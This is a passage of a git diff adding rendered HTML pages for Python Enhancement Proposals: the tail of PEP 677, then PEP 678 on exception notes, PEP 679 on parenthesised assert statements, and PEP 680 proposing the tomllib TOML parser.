There is no particular interaction between this proposal and from +__future__ import annotations - just like any other type annotation +it will be unparsed to a string at module import, and +typing.get_type_hints should correctly evaluate the resulting +strings in cases where that is possible.

+

This is discussed in more detail in the Runtime Behavior section.

+
+
+

Reference Implementation

+

We have a working implementation +of the AST and Grammar with tests verifying that the grammar proposed +here has the desired behaviors.

+

The runtime behavior is not yet implemented. As discussed in the +Runtime Behavior portion of the spec we have a detailed plan for +both a backward-compatible API and a more structured API in +a separate doc +where we are also open to discussion and alternative ideas.

+
+
+

Open Issues

+
+

Details of the Runtime API

+

We have attempted to provide a complete behavior specification in +the Runtime Behavior section of this PEP.

+

But there are probably more details that we will not realize we +need to define until we build a full reference implementation.

+
+
+

Optimizing SyntaxError messages

+

The current reference implementation has a fully-functional parser and +all edge cases presented here have been tested.

+

But there are some known cases where the errors are not as informative +as we would like. For example, because (int, ...) -> bool is +illegal but (int, ...) is a valid tuple, we currently produce a +syntax error flagging the -> as the problem even though the real +cause of the error is using ... as an argument type.

+

This is not part of the specification per se but is an important +detail to address in our implementation. The solution will likely +involve adding invalid_.* rules to python.gram and customizing +error messages.

+
+
+
+

Resources

+
+

Background and History

+

PEP 484 specifies +a very similar syntax for function type hint comments for use in +code that needs to work on Python 2.7. For example:

+
def f(x, y):
+    # type: (int, str) -> bool
+    ...
+
+
+

At that time we used indexing operations to specify generic types like +typing.Callable because we decided not to add syntax for +types. However, we have since begun to do so, e.g. with PEP 604.

+

Maggie proposed better callable type syntax as part of a larger +presentation on typing simplifications +at the PyCon Typing Summit 2021.

+

Steven brought up this proposal on typing-sig. +We had several meetings to discuss alternatives, and this presentation +led us to the current proposal.

+

Pradeep brought this proposal to python-dev +for feedback.

+
+
+

Acknowledgments

+

Thanks to the following people for their feedback on the PEP and help +planning the reference implementation:

+

Alex Waygood, Eric Traut, Guido van Rossum, James Hilton-Balfe, +Jelle Zijlstra, Maggie Moss, Tuomas Suutari, Shannon Zhu.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0677.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0678/index.html b/pep-0678/index.html new file mode 100644 index 00000000000..a862c59491a --- /dev/null +++ b/pep-0678/index.html @@ -0,0 +1,503 @@ + + + + + + + + PEP 678 – Enriching Exceptions with Notes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 678 – Enriching Exceptions with Notes

+
+
Author:
+
Zac Hatfield-Dodds <zac at zhd.dev>
+
Sponsor:
+
Irit Katriel
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
654
+
Created:
+
20-Dec-2021
+
Python-Version:
+
3.11
+
Post-History:
+
27-Jan-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at BaseException.add_note() and BaseException.__notes__.

+

×

+

See Enriching Exceptions with Notes for a user-focused tutorial.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Exception objects are typically initialized with a message that describes the +error which has occurred. Because further information may be available when +the exception is caught and re-raised, or included in an ExceptionGroup, +this PEP proposes to add BaseException.add_note(note), a +.__notes__ attribute holding a list of notes so added, and to +update the builtin traceback formatting code to include notes in the formatted +traceback following the exception string.

+

This is particularly useful in relation to PEP 654 ExceptionGroups, +which make previous workarounds ineffective or confusing. Use cases have been +identified in the standard library, Hypothesis and cattrs packages, and +common code patterns with retries.

+
+
+

Motivation

+

When an exception is created in order to be raised, it is usually initialized +with information that describes the error that has occurred. There are cases +where it is useful to add information after the exception was caught. For +example,

+
    +
  • testing libraries may wish to show the values involved in a failing +assertion, or the steps to reproduce a failure (e.g. pytest and +hypothesis; example below).
  • +
  • code which retries an operation on error may wish to associate an iteration, +timestamp, or other explanation with each of several errors - especially if +re-raising them in an ExceptionGroup.
  • +
  • programming environments for novices can provide more detailed descriptions +of various errors, and tips for resolving them.
  • +
+

Existing approaches must pass this additional information around while keeping +it in sync with the state of raised, and potentially caught or chained, +exceptions. This is already error-prone, and made more difficult by PEP 654 +ExceptionGroups, so the time is right for a built-in solution. We +therefore propose to add:

+
    +
  • a new method BaseException.add_note(note: str),
  • +
  • BaseException.__notes__, a list of note strings added using +.add_note(), and
  • +
  • support in the builtin traceback formatting code such that notes are +displayed in the formatted traceback following the exception string.
  • +
+
+

Example usage

+
>>> try:
+...     raise TypeError('bad type')
+... except Exception as e:
+...     e.add_note('Add some information')
+...     raise
+...
+Traceback (most recent call last):
+  File "<stdin>", line 2, in <module>
+TypeError: bad type
+Add some information
+>>>
+
+
+

When collecting exceptions into an exception group, we may want to add context +information for the individual errors. In the following example with +Hypothesis’ proposed support for ExceptionGroup, each exception +includes a note of the minimal failing example:

+
from hypothesis import given, strategies as st, target
+
+@given(st.integers())
+def test(x):
+    assert x < 0
+    assert x > 0
+
+
++ Exception Group Traceback (most recent call last):
+|   File "test.py", line 4, in test
+|     def test(x):
+|
+|   File "hypothesis/core.py", line 1202, in wrapped_test
+|     raise the_error_hypothesis_found
+|     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+| ExceptionGroup: Hypothesis found 2 distinct failures.
++-+---------------- 1 ----------------
+    | Traceback (most recent call last):
+    |   File "test.py", line 6, in test
+    |     assert x > 0
+    |     ^^^^^^^^^^^^
+    | AssertionError: assert -1 > 0
+    |
+    | Falsifying example: test(
+    |     x=-1,
+    | )
+    +---------------- 2 ----------------
+    | Traceback (most recent call last):
+    |   File "test.py", line 5, in test
+    |     assert x < 0
+    |     ^^^^^^^^^^^^
+    | AssertionError: assert 0 < 0
+    |
+    | Falsifying example: test(
+    |     x=0,
+    | )
+    +------------------------------------
+
+
+
+
+

Non-goals

+

Tracking multiple notes as a list, rather than by concatenating strings when +notes are added, is intended to maintain the distinction between the +individual notes. This might be required in specialized use cases, such +as translation of the notes by packages like friendly-traceback.

+

However, __notes__ is not intended to carry structured data. If your +note is for use by a program rather than display to a human, we recommend +instead (or additionally) choosing a convention for an attribute, e.g. +err._parse_errors = ... on the error or ExceptionGroup.

+

As a rule of thumb, we suggest that you should prefer exception chaining when the +error is going to be re-raised or handled as an individual error, and prefer +.add_note() when you want to avoid changing the exception type or +are collecting multiple exception objects to handle together. [1]

+
+
+
+

Specification

+

BaseException gains a new method .add_note(note: str). If note is +a string, .add_note(note) appends it to the __notes__ list, creating +the attribute if it does not already exist. If note is not a string, +.add_note() raises TypeError.

+

Libraries may clear existing notes by modifying or deleting the __notes__ +list, if it has been created, including clearing all notes with +del err.__notes__. This allows full control over the attached notes, +without overly complicating the API or adding multiple names to +BaseException.__dict__.

+

When an exception is displayed by the interpreter’s builtin traceback-rendering code, +its notes (if there are any) appear immediately after the exception message, in the order +in which they were added, with each note starting on a new line.

+

If __notes__ has been created, BaseExceptionGroup.subgroup and +BaseExceptionGroup.split create a new list for each new instance, containing +the same contents as the original exception group’s __notes__.

+

We do not specify the expected behaviour when users have assigned a non-list +value to __notes__, or a list which contains non-string elements. +Implementations might choose to emit warnings, discard or ignore bad values, +convert them to strings, raise an exception, or do something else entirely.

+
+
+

Backwards Compatibility

+

System-defined or “dunder” names (following the pattern __*__) are part of +the language specification, with unassigned names reserved for future use and +subject to breakage without warning. +We are also unaware of any code which would be broken by adding __notes__.

+

We were also unable to find any code which would be broken by the addition of +BaseException.add_note(): while searching Google and GitHub finds several +definitions +of an .add_note() method, none of them are on a subclass of +BaseException.

+
+
+

How to Teach This

+

The add_note() method and __notes__ attribute will be documented as +part of the language standard, and explained as part of the “Errors and +Exceptions” tutorial.

+
+
+

Reference Implementation

+

Following discussions related to PEP 654 [2], an early version of this +proposal was implemented in +and released in CPython 3.11.0a3, with a mutable string-or-none __note__ +attribute.

+

CPython PR #31317 +implements .add_note() and __notes__.

+
+
+

Rejected Ideas

+
+

Use print() (or logging, etc.)

+

Reporting explanatory or contextual information about an error by printing or +logging has historically been an acceptable workaround. However, we dislike +the way this separates the content from the exception object it refers to - +which can lead to “orphan” reports if the error was caught and handled later, +or merely significant difficulties working out which explanation corresponds to +which error. The new ExceptionGroup type intensifies these existing +challenges.

+

Keeping the __notes__ attached to the exception object, in the same way as +the __traceback__ attribute, eliminates these problems.

+
+
+

raise Wrapper(explanation) from err

+

An alternative pattern is to use exception chaining: by raising a ‘wrapper’ +exception containing the context or explanation from the current exception, +we avoid the separation challenges from print(). However, this has two key +problems.

+

First, it changes the type of the exception, which is often a breaking change +for downstream code. We consider always raising a Wrapper exception +unacceptably inelegant; but because custom exception types might have any +number of required arguments we can’t always create an instance of the same +type with our explanation. In cases where the exact exception type is known +this can work, such as the standard library http.client code, +but not for libraries which call user code.

+

Second, exception chaining reports several lines of additional detail, which +are distracting for experienced users and can be very confusing for beginners. +For example, six of the eleven lines reported for this simple example relate to +exception chaining, and are unnecessary with BaseException.add_note():

+
class Explanation(Exception):
+    def __str__(self):
+        return "\n" + str(self.args[0])
+
+try:
+    raise AssertionError("Failed!")
+except Exception as e:
+    raise Explanation("You can reproduce this error by ...") from e
+
+
+
$ python example.py
+Traceback (most recent call last):
+File "example.py", line 6, in <module>
+    raise AssertionError(why)
+AssertionError: Failed!
+                                                    # These lines are
+The above exception was the direct cause of ...     # confusing for new
+                                                    # users, and they
+Traceback (most recent call last):                  # only exist due
+File "example.py", line 8, in <module>              # to implementation
+    raise Explanation(msg) from e                   # constraints :-(
+Explanation:                                        # Hence this PEP!
+You can reproduce this error by ...
+
+
+

In cases where these two problems do not apply, we encourage use of exception +chaining rather than __notes__.

+
+
+

An assignable __note__ attribute

+

The first draft and implementation of this PEP defined a single attribute +__note__, which defaulted to None but could have a string assigned. +This is substantially simpler if, and only if, there is at most one note.

+

To promote interoperability and support translation of error messages by +libraries such as friendly-traceback, without resorting to dubious parsing +heuristics, we therefore settled on the .add_note()-and-__notes__ API.

+
+
+

Subclass Exception and add note support downstream

+

Traceback printing is built into the C code, and reimplemented in pure Python +in traceback.py. To get err.__notes__ printed from a downstream +implementation would also require writing custom traceback-printing code; +while this could be shared between projects and reuse some pieces of +traceback.py [3] we prefer to implement this once, upstream.

+

Custom exception types could implement their __str__ method to include our +proposed __notes__ semantics, but this would be rarely and inconsistently +applicable.

+
+
+

Don’t attach notes to Exceptions, just store them in ExceptionGroups

+

The initial motivation for this PEP was to associate a note with each error +in an ExceptionGroup. At the cost of a remarkably awkward API and the +cross-referencing problem discussed above, this +use-case could be supported by storing notes on the ExceptionGroup +instance instead of on each exception it contains.

+

We believe that the cleaner interface, and other use-cases described above, +are sufficient to justify the more general feature proposed by this PEP.

+
+
+

Add a helper function contextlib.add_exc_note()

+

It was suggested +that we add a utility such as the one below to the standard library. We do not +see this idea as core to the proposal of this PEP, and thus leave it for later +or downstream implementation - perhaps based on this example code:

+
@contextlib.contextmanager
+def add_exc_note(note: str):
+    try:
+        yield
+    except Exception as err:
+        err.add_note(note)
+        raise
+
+with add_exc_note(f"While attempting to frobnicate {item=}"):
+    frobnicate_or_raise(item)
+
+
+
+
+

Augment the raise statement

+

One discussion proposed raise Exception() with "note contents", but this +does not address the original motivation of compatibility with +ExceptionGroup.

+

Furthermore, we do not believe that the problem we are solving requires or +justifies new language syntax.

+
+
+
+

Acknowledgements

+

We wish to thank the many people who have assisted us through conversation, +code review, design advice, and implementation: Adam Turner, Alex Grönholm, +André Roberge, Barry Warsaw, Brett Cannon, CAM Gerlach, Carol Willing, Damian, +Erlend Aasland, Etienne Pot, Gregory Smith, Guido van Rossum, Irit Katriel, +Jelle Zijlstra, Ken Jin, Kumar Aditya, Mark Shannon, Matti Picus, Petr +Viktorin, Will McGugan, and pseudonymous commenters on Discord and Reddit.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0678.rst

+

Last modified: 2023-10-10 15:15:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0679/index.html b/pep-0679/index.html new file mode 100644 index 00000000000..7b89ab36fd3 --- /dev/null +++ b/pep-0679/index.html @@ -0,0 +1,281 @@ + + + + + + + + PEP 679 – Allow parentheses in assert statements | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 679 – Allow parentheses in assert statements

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
07-Jan-2022
+
Python-Version:
+
3.12
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to allow parentheses surrounding the two-argument form of +assert statements. This will cause the interpreter to reinterpret what before +would have been an assert with a two-element tuple that will always be True +(assert (expression, message)) to an assert statement with a subject and a +failure message, equivalent to the statement with the parentheses removed +(assert expression, message).

+
+
+

Motivation

+

It is a common user mistake when using the form of the assert statement that includes +the error message to surround it with parentheses. Unfortunately, this mistake +passes undetected as the assert will always pass, because it is +interpreted as an assert statement where the expression is a two-tuple, which +always has truth-y value.

+

The mistake most often happens when extending the test or description beyond a +single line, as parentheses are the natural way to do that.

+

This is so common that a SyntaxWarning is now emitted by the compiler.

+

Additionally, some other statements in the language allow parenthesized forms +in one way or another like import statements (from x import (a,b,c)) and +del statements (del (a,b,c)).

+

Allowing parentheses not only will remove the common mistake but also will allow +users and auto-formatters to format long assert statements over multiple lines +in what the authors of this document believe will be a more natural way. +Although is possible to currently format long assert statements over +multiple lines as:

+
assert (
+    very very long
+    expression
+), (
+    "very very long "
+    "message"
+)
+
+
+

the authors of this document believe the parenthesized form is more clear and more consistent with +the formatting of other grammar constructs:

+
assert (
+    very very long
+    expression,
+
+    "very very long "
+    "message",
+)
+
+
+

This change has been originally discussed and proposed in [bpo-46167].

+
+
+

Rationale

+

This change can be implemented in the parser or in the compiler. We have +selected implementing this change in the parser because doing it in the compiler +will require re-interpreting the AST of an assert statement with a two-tuple:

+
Module(
+    body=[
+        Assert(
+            test=Tuple(
+                elts=[
+                    Name(id='x', ctx=Load()),
+                    Name(id='y', ctx=Load())],
+                ctx=Load()))],
+    type_ignores=[])
+
+
+

as the AST of an assert statement with an expression and a message:

+
Module(
+    body=[
+        Assert(
+            test=Name(id='x', ctx=Load()),
+            msg=Name(id='y', ctx=Load()))],
+    type_ignores=[])
+
+
+

The problem with this approach is that the AST of the first form will +technically be “incorrect” as we already have a specialized form for the AST of +an assert statement with a test and a message (the second one). This +means that many tools that deal with ASTs will need to be aware of this change +in semantics, which will be confusing as there is already a correct form that +better expresses the new meaning.

+
+
+

Specification

+

This PEP proposes changing the grammar of the assert statement to:

+
| 'assert' '(' expression ',' expression [','] ')' &(NEWLINE | ';')
+| 'assert' a=expression [',' expression ]
+
+
+

Where the first line is the new form of the assert statement that allows +parentheses. The lookahead is needed so statements like assert (a, b) <= c, +"something" are still parsed correctly and to prevent the parser to eagerly +capture the tuple as the full statement.

+

Optionally, new “invalid” rule can be added to produce custom syntax errors to +cover tuples with 0, 1, 3 or more elements.

+
+
+

Backwards Compatibility

+

The change is not technically backwards compatible, as parsing assert (x,y) +is currently interpreted as an assert statement with a 2-tuple as the subject, +while after this change it will be interpreted as assert x,y.

+

On the other hand, assert statements of this kind always pass, so they are +effectively not doing anything in user code. The authors of this document think +that this backwards incompatibility nature is beneficial, as it will highlight +these cases in user code while before they will have passed unnoticed (assuming that +these cases still exist because users are ignoring syntax warnings).

+
+
+

Security Implications

+

There are no security implications for this change.

+
+
+

How to Teach This

+

The new form of the assert statement will be documented as part of the language +standard.

+

When teaching the form with error message of the assert statement to users, +now it can be noted that adding parentheses also work as expected, which allows to break +the statement over multiple lines.

+
+
+

Reference Implementation

+

A proposed draft PR with the change exist in [GH-30247].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0679.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0680/index.html b/pep-0680/index.html new file mode 100644 index 00000000000..a66ca5512f8 --- /dev/null +++ b/pep-0680/index.html @@ -0,0 +1,598 @@ + + + + + + + + PEP 680 – tomllib: Support for Parsing TOML in the Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 680 – tomllib: Support for Parsing TOML in the Standard Library

+
+
Author:
+
Taneli Hukkinen, Shantanu Jain <hauntsaninja at gmail.com>
+
Sponsor:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2022
+
Python-Version:
+
3.11
+
Post-History:
+
09-Dec-2021, +27-Jan-2022
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at tomllib.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes adding the tomllib module to the standard library for +parsing TOML (Tom’s Obvious Minimal Language, +https://toml.io).

+
+
+

Motivation

+

TOML is the format of choice for Python packaging, as evidenced by +PEP 517, PEP 518 and PEP 621. This creates a bootstrapping +problem for Python build tools, forcing them to vendor a TOML parsing +package or employ other undesirable workarounds, and causes serious issues +for repackagers and other downstream consumers. Including TOML support in +the standard library would neatly solve all of these issues.

+

Further, many Python tools are now configurable via TOML, such as +black, mypy, pytest, tox, pylint and isort. +Many that are not, such as flake8, cite the lack of standard library +support as a main reason why. +Given the special place TOML already has in the Python ecosystem, it makes sense +for it to be an included battery.

+

Finally, TOML as a format is increasingly popular (for the reasons +outlined in PEP 518), with various Python TOML libraries having about +2000 reverse dependencies on PyPI (for comparison, requests has about +28000 reverse dependencies). Hence, this is likely to be a generally useful +addition, even looking beyond the needs of Python packaging and related tools.

+
+
+

Rationale

+

This PEP proposes basing the standard library support for reading TOML on the +third-party library tomli +(github.com/hukkin/tomli).

+

Many projects have recently switched to using tomli, such as pip, +build, pytest, mypy, black, flit, coverage, +setuptools-scm and cibuildwheel.

+

tomli is actively maintained and well-tested. It is about 800 lines +of code with 100% test coverage, and passes all tests in the +proposed official TOML compliance test suite, as well as +the more established BurntSushi/toml-test suite.

+
+
+

Specification

+

A new module tomllib will be added to the Python standard library, +exposing the following public functions:

+
def load(
+    fp: SupportsRead[bytes],
+    /,
+    *,
+    parse_float: Callable[[str], Any] = ...,
+ ) -> dict[str, Any]: ...
+
+def loads(
+    s: str,
+    /,
+    *,
+    parse_float: Callable[[str], Any] = ...,
+) -> dict[str, Any]: ...
+
+
+

tomllib.load deserializes a binary file-like object containing a +TOML document to a Python dict. +The fp argument must have a read() method with the same API as +io.RawIOBase.read().

+

tomllib.loads deserializes a str instance containing a TOML document +to a Python dict.

+

The parse_float argument is a callable object that takes as input the +original string representation of a TOML float, and returns a corresponding +Python object (similar to parse_float in json.load). +For example, the user may pass a function returning a decimal.Decimal, +for use cases where exact precision is important. By default, TOML floats +are parsed as instances of the Python float type.

+

The returned object contains only basic Python objects (str, int, +bool, float, datetime.{datetime,date,time}, list, dict with +string keys), and the results of parse_float.

+

tomllib.TOMLDecodeError is raised in the case of invalid TOML.

+

Note that this PEP does not propose tomllib.dump or tomllib.dumps +functions; see Including an API for writing TOML for details.

+
+
+

Maintenance Implications

+
+

Stability of TOML

+

The release of TOML 1.0.0 in January 2021 indicates the TOML format should +now be officially considered stable. Empirically, TOML has proven to be a +stable format even prior to the release of TOML 1.0.0. From the +changelog, we +can see that TOML has had no major changes since April 2020, and has had +two releases in the past five years (2017-2021).

+

In the event of changes to the TOML specification, we can treat minor +revisions as bug fixes and update the implementation in place. In the event of +major breaking changes, we should preserve support for TOML 1.x.

+
+
+

Maintainability of proposed implementation

+

The proposed implementation (tomli) is pure Python, well tested and +weighs in at under 1000 lines of code. It is minimalist, offering a smaller API +surface area than other TOML implementations.

+

The author of tomli is willing to help integrate tomli into the standard +library and help maintain it, as per this post. +Furthermore, Python core developer Petr Viktorin has indicated a willingness +to maintain a read API, as per this post.

+

Rewriting the parser in C is not deemed necessary at this time. It is rare for +TOML parsing to be a bottleneck in applications, and users with higher performance +needs can use a third-party library (as is already often the case with JSON, +despite Python offering a standard library C-extension module).

+
+
+

TOML support a slippery slope for other things

+

As discussed in the Motivation section, TOML holds a special place in the +Python ecosystem, for reading PEP 518 pyproject.toml packaging +and tool configuration files. +This chief reason to include TOML in the standard library does not apply to +other formats, such as YAML or MessagePack.

+

In addition, the simplicity of TOML distinguishes it from other formats like +YAML, which are highly complicated to construct and parse.

+

An API for writing TOML may, however, be added in a future PEP.

+
+
+
+

Backwards Compatibility

+

This proposal has no backwards compatibility issues within the standard +library, as it describes a new module. +Any existing third-party module named tomllib will break, as +import tomllib will import the standard library module. +However, tomllib is not registered on PyPI, so it is unlikely that any +module with this name is widely used.

+

Note that we avoid using the more straightforward name toml to avoid +backwards compatibility implications for users who have pinned versions of the +current toml PyPI package. +For more details, see the Alternative names for the module section.

+
+
+

Security Implications

+

Errors in the implementation could cause potential security issues. +However, the parser’s output is limited to simple data types; inability to load +arbitrary classes avoids security issues common in more “powerful” formats like +pickle and YAML. Also, the implementation will be in pure Python, which reduces +security issues endemic to C, such as buffer overflows.

+
+
+

How to Teach This

+

The API of tomllib mimics that of other well-established file format +libraries, such as json and pickle. The lack of a dump function will +be explained in the documentation, with a link to relevant third-party libraries +(e.g. tomlkit, tomli-w, pytomlpp).

+
+
+

Reference Implementation

+

The proposed implementation can be found at https://github.com/hukkin/tomli

+
+
+

Rejected Ideas

+
+

Basing on another TOML implementation

+

Several potential alternative implementations exist:

+
    +
  • tomlkit is well established, actively maintained and supports TOML 1.0.0. +An important difference is that tomlkit supports style roundtripping. As a +result, it has a more complex API and implementation (about 5x as much code as +tomli). Its author does not believe that tomlkit is a good choice for +the standard library.
  • +
  • toml is a very widely used library. However, it is not actively +maintained, does not support TOML 1.0.0 and has a number of known bugs. Its +API is more complex than that of tomli. It allows customising output style +through a complicated encoder API, and some very limited and mostly unused +functionality to preserve input style through an undocumented decoder API. +For more details on its API differences from this PEP, refer to Appendix A.
  • +
  • pytomlpp is a Python wrapper for the C++ project toml++. Pure Python +libraries are easier to maintain than extension modules.
  • +
  • rtoml is a Python wrapper for the Rust project toml-rs and hence has +similar shortcomings to pytomlpp. +In addition, it does not support TOML 1.0.0.
  • +
  • Writing an implementation from scratch. It’s unclear what we would get from +this; tomli meets our needs and the author is willing to help with its +inclusion in the standard library.
  • +
+
+
+

Including an API for writing TOML

+

There are several reasons to not include an API for writing TOML.

+

The ability to write TOML is not needed for the use cases that motivate this +PEP: core Python packaging tools, and projects that need to read TOML +configuration files.

+

Use cases that involve editing an existing TOML file (as opposed to writing a +brand new one) are better served by a style preserving library. TOML is +intended as a human-readable and -editable configuration format, so it’s +important to preserve comments, formatting and other markup. This requires +a parser whose output includes style-related metadata, making it impractical +to output plain Python types like str and dict. Furthermore, it +substantially complicates the design of the API.

+

Even without considering style preservation, there are too many degrees of +freedom in how to design a write API. For example, what default style +(indentation, vertical and horizontal spacing, quotes, etc) should the library +use for the output, and how much control should users be given over it? +How should the library handle input and output validation? Should it support +serialization of custom types, and if so, how? While there are reasonable +options for resolving these issues, the nature of the standard library is such +that we only get “one chance to get it right”.

+

Currently, no CPython core developers have expressed willingness to maintain a +write API, or sponsor a PEP that includes one. Since it is hard to change +or remove something in the standard library, it is safer to err on the side of +exclusion for now, and potentially revisit this later.

+

Therefore, writing TOML is left to third-party libraries. If a good API and +relevant use cases for it are found later, write support can be added in a +future PEP.

+
+
+

Assorted API details

+
+

Types accepted as the first argument of tomllib.load

+

The toml library on PyPI allows passing paths (and lists of path-like +objects, ignoring missing files and merging the documents into a single object) +to its load function. However, allowing this here would be inconsistent +with the behavior of json.load, pickle.load and other standard library +functions. If we agree that consistency here is desirable, +allowing paths is out of scope for this PEP. This can easily and explicitly +be worked around in user code, or by using a third-party library.

+

The proposed API takes a binary file, while toml.load takes a text file and +json.load takes either. Using a binary file allows us to ensure UTF-8 is +the encoding used (ensuring correct parsing on platforms with other default +encodings, such as Windows), and avoid incorrectly parsing files containing +single carriage returns as valid TOML due to universal newlines in text mode.

+
+
+

Type accepted as the first argument of tomllib.loads

+

While tomllib.load takes a binary file, tomllib.loads takes +a text string. This may seem inconsistent at first.

+

Quoting the TOML v1.0.0 specification:

+
+
A TOML file must be a valid UTF-8 encoded Unicode document.
+

tomllib.loads does not intend to load a TOML file, but rather the +document that the file stores. The most natural representation of +a Unicode document in Python is str, not bytes.

+

It is possible to add bytes support in the future if needed, but +we are not aware of any use cases for it.

+
+
+
+

Controlling the type of mappings returned by tomllib.load[s]

+

The toml library on PyPI accepts a _dict argument in its load[s] +functions, which works similarly to the object_hook argument in +json.load[s]. There are several uses of _dict found on +https://grep.app; however, almost all of them are passing +_dict=OrderedDict, which should be unnecessary as of Python 3.7. +We found two instances of relevant use: in one case, a custom class was passed +for friendlier KeyErrors; in the other, the custom class had several +additional lookup and mutation methods (e.g. to help resolve dotted keys).

+

Such a parameter is not necessary for the core use cases outlined in the +Motivation section. The absence of this can be pretty easily worked around +using a wrapper class, transformer function, or a third-party library. Finally, +support could be added later in a backward-compatible way.

+
+
+

Removing support for parse_float in tomllib.load[s]

+

This option is not strictly necessary, since TOML floats should be implemented +as “IEEE 754 binary64 values”, which is equivalent to a Python float on most +architectures.

+

The TOML specification uses the word “SHOULD”, however, implying a +recommendation that can be ignored for valid reasons. Parsing floats +differently, such as to decimal.Decimal, allows users extra precision beyond +that promised by the TOML format. In the author of tomli’s experience, this +is particularly useful in scientific and financial applications. This is also +useful for other cases that need greater precision, or where end-users include +non-developers who may not be aware of the limits of binary64 floats.

+

There are also niche architectures where the Python float is not a IEEE 754 +binary64 value. The parse_float argument allows users to achieve correct +TOML semantics even on such architectures.

+
+
+

Alternative names for the module

+

Ideally, we would be able to use the toml module name.

+

However, the toml package on PyPI is widely used, so there are backward +compatibility concerns. Since the standard library takes precedence over third +party packages, libraries and applications who current depend on the toml +package would likely break when upgrading Python versions due to the many +API incompatibilities listed in Appendix A, +even if they pin their dependency versions.

+

To further clarify, applications with pinned dependencies are of greatest +concern here. Even if we were able to obtain control of the toml PyPI +package name and repurpose it for a backport of the proposed new module, +we would still break users on new Python versions that included it in the +standard library, regardless of whether they have pinned an older version of +the existing toml package. This is unfortunate, since pinning +would likely be a common response to breaking changes introduced by repurposing +the toml package as a backport (that is incompatible with today’s toml).

+

Finally, the toml package on PyPI is not actively maintained, but as of +yet, efforts to request that the author add other maintainers +have been unsuccessful, +so action here would likely have to be taken without the author’s consent.

+

Instead, this PEP proposes the name tomllib. This mirrors plistlib +and xdrlib, two other file format modules in the standard library, as well +as other modules, such as pathlib, contextlib and graphlib.

+

Other names considered but rejected include:

+
    +
  • tomlparser. This mirrors configparser, but is perhaps somewhat less +appropriate if we include a write API in the future.
  • +
  • tomli. This assumes we use tomli as the basis for implementation.
  • +
  • toml under some namespace, such as parser.toml. However, this is +awkward, especially so since existing parsing libraries like json, +pickle, xml, html etc. would not be included in the namespace.
  • +
+
+
+
+

Previous Discussion

+ +
+
+

Appendix A: Differences between proposed API and toml

+

This appendix covers the differences between the API proposed in this PEP and +that of the third-party package toml. These differences are relevant to +understanding the amount of breakage we could expect if we used the toml +name for the standard library module, as well as to better understand the design +space. Note that this list might not be exhaustive.

+
    +
  1. No proposed inclusion of a write API (no toml.dump[s])

    This PEP currently proposes not including a write API; that is, there will +be no equivalent of toml.dump or toml.dumps, as discussed at +Including an API for writing TOML.

    +

    If we included a write API, it would be relatively straightforward to +convert most code that uses toml to the new standard library module +(acknowledging that this is very different from a compatible API, as it +would still require code changes).

    +

    A significant fraction of toml users rely on this, based on comparing +occurrences of “toml.load” +to occurrences of “toml.dump”.

    +
  2. +
  3. Different first argument of toml.load

    toml.load has the following signature:

    +
    def load(
    +    f: Union[SupportsRead[str], str, bytes, list[PathLike | str | bytes]],
    +    _dict: Type[MutableMapping[str, Any]] = ...,
    +    decoder: TomlDecoder = ...,
    +) -> MutableMapping[str, Any]: ...
    +
    +
    +

    This is quite different from the first argument proposed in this PEP: +SupportsRead[bytes].

    +

    Recapping the reasons for this, previously mentioned at +Types accepted as the first argument of tomllib.load:

    +
      +
    • Allowing paths (and even lists of paths) as arguments is inconsistent with +other similar functions in the standard library.
    • +
    • Using SupportsRead[bytes] allows us to ensure UTF-8 is the encoding used, +and avoid incorrectly parsing single carriage returns as valid TOML.
    • +
    +

    A significant fraction of toml users rely on this, based on manual +inspection of occurrences of “toml.load”.

    +
  4. +
  5. Errors

    toml raises TomlDecodeError, vs. the proposed PEP 8-compliant +TOMLDecodeError.

    +

    A significant fraction of toml users rely on this, based on +occurrences of “TomlDecodeError”.

    +
  6. +
  7. toml.load[s] accepts a _dict argument

    Discussed at Controlling the type of mappings returned by tomllib.load[s].

    +

    As mentioned there, almost all usage consists of _dict=OrderedDict, +which is not necessary in Python 3.7 and later.

    +
  8. +
  9. toml.load[s] support an undocumented decoder argument

    It seems the intended use case is for an implementation of comment +preservation. The information recorded is not sufficient to roundtrip the +TOML document preserving style, the implementation has known bugs, the +feature is undocumented and we could only find one instance of its use on +https://grep.app.

    +

    The toml.TomlDecoder interface +exposed is far from simple, containing nine methods.

    +

    Users are likely better served by a more complete implementation of +style-preserving parsing and writing.

    +
  10. +
